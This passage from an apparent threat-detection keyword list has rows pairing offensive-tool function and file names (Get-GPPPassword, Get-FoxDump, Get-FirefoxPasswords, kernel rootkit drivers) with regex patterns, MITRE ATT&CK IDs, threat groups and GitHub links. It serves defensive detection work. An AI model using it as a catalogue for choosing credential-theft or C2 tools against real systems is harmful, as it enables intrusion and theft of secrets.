- AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - 
APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","46008" "*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46009" "*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black 
Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","46010" "*Get-ExploitableSystem.*",".{0,1000}Get\-ExploitableSystem\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","46011" "*Get-ExploitableSystem.psm1*",".{0,1000}Get\-ExploitableSystem\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46012" "*Get-ExploitableSystems.psm1*",".{0,1000}Get\-ExploitableSystems\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","46013" "*Get-ExploitableUnquotedPath*",".{0,1000}Get\-ExploitableUnquotedPath.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","46014" "*Get-FakeServiceUsers*",".{0,1000}Get\-FakeServiceUsers.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","46015" "*Get-FileContentsWMImplant*",".{0,1000}Get\-FileContentsWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","46016" "*Get-FireFoxHistory*",".{0,1000}Get\-FireFoxHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46017" "*Get-FirefoxPasswords *",".{0,1000}Get\-FirefoxPasswords\s.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46018" 
"*Get-FirefoxPasswords.ps1*",".{0,1000}Get\-FirefoxPasswords\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46019" "*Get-ForgedUserAgent *",".{0,1000}Get\-ForgedUserAgent\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","46020" "*Get-ForgedUserAgent.ps1*",".{0,1000}Get\-ForgedUserAgent\.ps1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","46021" "*Get-FoxDump *",".{0,1000}Get\-FoxDump\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - 
T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46022" "*Get-FoxDump*",".{0,1000}Get\-FoxDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46023" "*Get-FoxDump.ps1*",".{0,1000}Get\-FoxDump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 
- T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46024" "*GetFullPrivsClient.exe*",".{0,1000}GetFullPrivsClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","46025" "*GetFullPrivsDrv_x64.sys*",".{0,1000}GetFullPrivsDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","46026" "*get-get-get-get/PowerProxy*",".{0,1000}get\-get\-get\-get\/PowerProxy.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with 
reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","46027" "*Get-GPOEnum*",".{0,1000}Get\-GPOEnum.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46029" "*Get-GPOsPerOU*",".{0,1000}Get\-GPOsPerOU.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46030" "*Get-GPOtoFile*",".{0,1000}Get\-GPOtoFile.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46031" "*Get-GPPAutologon *",".{0,1000}Get\-GPPAutologon\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46032" "*Get-GPPAutologon.*",".{0,1000}Get\-GPPAutologon\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46033" "*Get-GPPAutologons*",".{0,1000}Get\-GPPAutologons.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46034" "*getgppgroups *",".{0,1000}getgppgroups\s\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46035" "*Get-GPPInnerFields*",".{0,1000}Get\-GPPInnerFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46036" "*getgpppassword 
*",".{0,1000}getgpppassword\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46037" "*Get-GPPPassword -*",".{0,1000}Get\-GPPPassword\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46038" "*Get-GPPPassword | more*",".{0,1000}Get\-GPPPassword\s\|\smore.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46039" "*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - 
WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46040" "*Get-GPPPassword*",".{0,1000}Get\-GPPPassword.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46041" "*Get-GPPPassword.*",".{0,1000}Get\-GPPPassword\..{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","46042" "*Get-GPPPassword.json*",".{0,1000}Get\-GPPPassword\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 
